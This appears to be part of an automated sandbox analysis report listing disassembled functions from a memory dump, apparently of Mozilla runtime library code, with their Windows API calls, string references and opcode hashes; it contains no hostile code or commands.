                                                                                                      • Opcode ID: 8000e61284095306a8d82106c4bbaa52265ba0ec6fb1c8b68750a54616ef31d6
                                                                                                      • Instruction ID: ddb6c532a2bdea4cf88b796b257424dacc452b617f88d38d7fce6af0101dba5b
                                                                                                      • Opcode Fuzzy Hash: 8000e61284095306a8d82106c4bbaa52265ba0ec6fb1c8b68750a54616ef31d6
                                                                                                      • Instruction Fuzzy Hash: 16314871F042086BDB0CCFADD89129EBFE6EB8C314F15853EE8059B781EB7498048B91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 6CF94290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CFD3EBD,6CFD3EBD,00000000), ref: 6CF942A9
                                                                                                      • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6CFEB127), ref: 6CFEB463
                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CFEB4C9
                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6CFEB4E4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _getpidstrlenstrncmptolower
                                                                                                      • String ID: pid:
                                                                                                      • API String ID: 1720406129-3403741246
                                                                                                      • Opcode ID: facb4cb15aa308015e81730f322f7ada9a9cd928f6b2ea077ff6ccfae203c16f
                                                                                                      • Instruction ID: 0803d3445ec0c3a6732300f0358bb14c73872a1b7ebd4fc9bb25fbb329de55cb
                                                                                                      • Opcode Fuzzy Hash: facb4cb15aa308015e81730f322f7ada9a9cd928f6b2ea077ff6ccfae203c16f
                                                                                                      • Instruction Fuzzy Hash: A231F431A01309EFDB00DFA9D880BEEB7B5FF49318F540929E81167A41D731A849CBE5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDE577
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFDE584
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFDE5DE
                                                                                                      • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6CFDE8A6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
                                                                                                      • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
                                                                                                      • API String ID: 1483687287-53385798
                                                                                                      • Opcode ID: b3c3eeeb7763bab40b9f170f1d26382be06e47b204b1f202b09801ba7c6a9275
                                                                                                      • Instruction ID: 81b7a2caae0c36081bbf06f4e9a5ade5bc1935063dd2621dfbfbe734d0a5d1e7
                                                                                                      • Opcode Fuzzy Hash: b3c3eeeb7763bab40b9f170f1d26382be06e47b204b1f202b09801ba7c6a9275
                                                                                                      • Instruction Fuzzy Hash: CB11A132904264DFDB00DF94CC4AB6ABBF8FB89368F550619E86A87740D770A845CB92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CFE0CD5
                                                                                                        • Part of subcall function 6CFCF960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CFCF9A7
                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CFE0D40
                                                                                                      • free.MOZGLUE ref: 6CFE0DCB
                                                                                                        • Part of subcall function 6CFB5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CFB5EDB
                                                                                                        • Part of subcall function 6CFB5E90: memset.VCRUNTIME140(6CFF7765,000000E5,55CCCCCC), ref: 6CFB5F27
                                                                                                        • Part of subcall function 6CFB5E90: LeaveCriticalSection.KERNEL32(?), ref: 6CFB5FB2
                                                                                                      • free.MOZGLUE ref: 6CFE0DDD
                                                                                                      • free.MOZGLUE ref: 6CFE0DF2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 4069420150-0
                                                                                                      • Opcode ID: cff696e64412f78440234cdddf8e46501805a2fa4364bf834d85e0d24c89d317
                                                                                                      • Instruction ID: 1715ebcb76fcc71e86f55aeac5695a6cb74db69ecf7798dd077e1d6b46084c67
                                                                                                      • Opcode Fuzzy Hash: cff696e64412f78440234cdddf8e46501805a2fa4364bf834d85e0d24c89d317
                                                                                                      • Instruction Fuzzy Hash: EB413A71908780ABD320CF29C48079EFBE5BFC9754F118A2EE8D887710DBB09445CB92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6CFDDA31,00100000,?,?,00000000,?), ref: 6CFECDA4
                                                                                                        • Part of subcall function 6CFACA10: malloc.MOZGLUE(?), ref: 6CFACA26
                                                                                                        • Part of subcall function 6CFED130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6CFECDBA,00100000,?,00000000,?,6CFDDA31,00100000,?,?,00000000,?), ref: 6CFED158
                                                                                                        • Part of subcall function 6CFED130: InitializeConditionVariable.KERNEL32(00000098,?,6CFECDBA,00100000,?,00000000,?,6CFDDA31,00100000,?,?,00000000,?), ref: 6CFED177
                                                                                                      • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6CFDDA31,00100000,?,?,00000000,?), ref: 6CFECDC4
                                                                                                        • Part of subcall function 6CFE7480: ReleaseSRWLockExclusive.KERNEL32(?,6CFF15FC,?,?,?,?,6CFF15FC,?), ref: 6CFE74EB
                                                                                                      • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6CFDDA31,00100000,?,?,00000000,?), ref: 6CFECECC
                                                                                                        • Part of subcall function 6CFACA10: mozalloc_abort.MOZGLUE(?), ref: 6CFACAA2
                                                                                                        • Part of subcall function 6CFDCB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6CFECEEA,?,?,?,?,00000000,?,6CFDDA31,00100000,?,?,00000000), ref: 6CFDCB57
                                                                                                        • Part of subcall function 6CFDCB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6CFDCBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6CFECEEA,?,?), ref: 6CFDCBAF
                                                                                                      • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6CFDDA31,00100000,?,?,00000000,?), ref: 6CFED058
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                                                                                      • String ID:
                                                                                                      • API String ID: 861561044-0
                                                                                                      • Opcode ID: 741cc6e199079def58db3336a9d2df46e612ecb3c58e20f8f59437b2a8437be6
                                                                                                      • Instruction ID: 169dbd40c78fbf484ba755a01f648a6f9f63337cd2cbdac8f26256f847019d16
                                                                                                      • Opcode Fuzzy Hash: 741cc6e199079def58db3336a9d2df46e612ecb3c58e20f8f59437b2a8437be6
                                                                                                      • Instruction Fuzzy Hash: E3D17071A04B46AFD708CF28C480B99FBE1BF89304F05862DE95987752EB31E965CBD1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetTickCount64.KERNEL32 ref: 6CFB5D40
                                                                                                      • EnterCriticalSection.KERNEL32(6D01F688), ref: 6CFB5D67
                                                                                                      • __aulldiv.LIBCMT ref: 6CFB5DB4
                                                                                                      • LeaveCriticalSection.KERNEL32(6D01F688), ref: 6CFB5DED
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                                      • String ID:
                                                                                                      • API String ID: 557828605-0
                                                                                                      • Opcode ID: 8e4176b162b243dbeee038808f18199a94f7d6a70ced983e97be1766730b9587
                                                                                                      • Instruction ID: 13b96e4e8a77e6b6716e65627c2b283851b71fcae70e3a006e0490e5b5773a10
                                                                                                      • Opcode Fuzzy Hash: 8e4176b162b243dbeee038808f18199a94f7d6a70ced983e97be1766730b9587
                                                                                                      • Instruction Fuzzy Hash: 1C517D72E042298FCF08CFA9C855BAEBBB6FB89304F19861DD825B7750C7746945CB90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6CF9CEBD
                                                                                                      • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6CF9CEF5
                                                                                                      • memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6CF9CF4E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memset
                                                                                                      • String ID: 0
                                                                                                      • API String ID: 438689982-4108050209
                                                                                                      • Opcode ID: da439991182a5e866317c34d3ebecf51e52030f1455aed99f285427a2ba4e7f3
                                                                                                      • Instruction ID: 7bcb30a784d5212cc0146187d3d5c15a5ea022d6f4cb3d758f76f8fb28cc51ec
                                                                                                      • Opcode Fuzzy Hash: da439991182a5e866317c34d3ebecf51e52030f1455aed99f285427a2ba4e7f3
                                                                                                      • Instruction Fuzzy Hash: E1511475A042168FDB04CF18C890A9ABBB5EF99304F19859DD85A5F352D731ED06CBE0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6CFD82BC,?,?), ref: 6CFD649B
                                                                                                        • Part of subcall function 6CFACA10: malloc.MOZGLUE(?), ref: 6CFACA26
                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CFD64A9
                                                                                                        • Part of subcall function 6CFCFA80: GetCurrentThreadId.KERNEL32 ref: 6CFCFA8D
                                                                                                        • Part of subcall function 6CFCFA80: AcquireSRWLockExclusive.KERNEL32(6D01F448), ref: 6CFCFA99
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CFD653F
                                                                                                      • free.MOZGLUE(?), ref: 6CFD655A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 3596744550-0
                                                                                                      • Opcode ID: 4d7bf1c7724fbc7a2db16ab829574dfa9c773e3205a7f3564a9720172e1743ea
                                                                                                      • Instruction ID: edbc7d540c42bfeccc6824f0ac95e9c5fc0f397f2afdbc48c4c4b13cb071fd76
                                                                                                      • Opcode Fuzzy Hash: 4d7bf1c7724fbc7a2db16ab829574dfa9c773e3205a7f3564a9720172e1743ea
                                                                                                      • Instruction Fuzzy Hash: 2D317EB5A043059FD704CF14D880B9EBBE4BF89314F10482EF85A97741EB30E919CB92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFAB4F5
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFAB502
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFAB542
                                                                                                      • free.MOZGLUE(?), ref: 6CFAB578
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                      • String ID:
                                                                                                      • API String ID: 2047719359-0
                                                                                                      • Opcode ID: 2ed93f1bf0435bdaa705c9efd78f21df9b7bb944f926a208c2013e765eb4f06f
                                                                                                      • Instruction ID: b7e213375b4fdf9715d573d8fa19b3a0a09499860dd71e13b35e2c20830f85b3
                                                                                                      • Opcode Fuzzy Hash: 2ed93f1bf0435bdaa705c9efd78f21df9b7bb944f926a208c2013e765eb4f06f
                                                                                                      • Instruction Fuzzy Hash: CB11E432814B45CBD312CFE9C8007A2F7B5FF96318F10570AE85953A01EBB0B1C68790
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6CF9F20E,?), ref: 6CFD3DF5
                                                                                                      • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6CF9F20E,00000000,?), ref: 6CFD3DFC
                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CFD3E06
                                                                                                      • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6CFD3E0E
                                                                                                        • Part of subcall function 6CFCCC00: GetCurrentProcess.KERNEL32(?,?,6CF931A7), ref: 6CFCCC0D
                                                                                                        • Part of subcall function 6CFCCC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6CF931A7), ref: 6CFCCC16
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
                                                                                                      • String ID:
                                                                                                      • API String ID: 2787204188-0
                                                                                                      • Opcode ID: cbe8299bdb6cf2ed4b0f5e80f77d42d9ddc279a48c1d4e54e73d1fcaa4e32220
                                                                                                      • Instruction ID: 84ab761d214b969a4fdc705271a8a5b4a250733535fd63d4b350f30955700d15
                                                                                                      • Opcode Fuzzy Hash: cbe8299bdb6cf2ed4b0f5e80f77d42d9ddc279a48c1d4e54e73d1fcaa4e32220
                                                                                                      • Instruction Fuzzy Hash: D3F012715402097BE7019B94DC42EAB377DDB46624F090034FE1857741D735BD2986F7
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6CFE85D3
                                                                                                        • Part of subcall function 6CFACA10: malloc.MOZGLUE(?), ref: 6CFACA26
                                                                                                      • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6CFE8725
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Xlength_error@std@@mallocmoz_xmalloc
                                                                                                      • String ID: map/set<T> too long
                                                                                                      • API String ID: 3720097785-1285458680
                                                                                                      • Opcode ID: 5c9a38296ed53a2c1087fec315de5d7779407ef75fb9210b35d22f89f9488d19
                                                                                                      • Instruction ID: c760f47328bf771f4c8f9d3a36910687c1cf14d62fddba12fd461d740a8297a0
                                                                                                      • Opcode Fuzzy Hash: 5c9a38296ed53a2c1087fec315de5d7779407ef75fb9210b35d22f89f9488d19
                                                                                                      • Instruction Fuzzy Hash: 3D5164B4604641AFD701DF19C184B5ABBF1BF8A318F18C29AD8595BB62C335EC85CF92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6CF9BDEB
                                                                                                      • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6CF9BE8F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                                                                                      • String ID: 0
                                                                                                      • API String ID: 2811501404-4108050209
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CFD3D19
                                                                                                      • mozalloc_abort.MOZGLUE(?), ref: 6CFD3D6C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _errnomozalloc_abort
                                                                                                      • String ID: d
                                                                                                      • API String ID: 3471241338-2564639436
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6CFF6E22
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CFF6E3F
                                                                                                      Strings
                                                                                                      • MOZ_DISABLE_WALKTHESTACK, xrefs: 6CFF6E1D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Init_thread_footergetenv
                                                                                                      • String ID: MOZ_DISABLE_WALKTHESTACK
                                                                                                      • API String ID: 1472356752-1153589363
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CFA9EEF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Init_thread_footer
                                                                                                      • String ID: Infinity$NaN
                                                                                                      • API String ID: 1385522511-4285296124
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • DisableThreadLibraryCalls.KERNEL32(?), ref: 6CFABEE3
                                                                                                      • LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6CFABEF5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$CallsDisableLoadThread
                                                                                                      • String ID: cryptbase.dll
                                                                                                      • API String ID: 4137859361-1262567842
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6CFEB2C9,?,?,?,6CFEB127,?,?,?,?,?,?,?,?,?,6CFEAE52), ref: 6CFEB628
                                                                                                        • Part of subcall function 6CFE90E0: free.MOZGLUE(?,00000000,?,?,6CFEDEDB), ref: 6CFE90FF
                                                                                                        • Part of subcall function 6CFE90E0: free.MOZGLUE(?,00000000,?,?,6CFEDEDB), ref: 6CFE9108
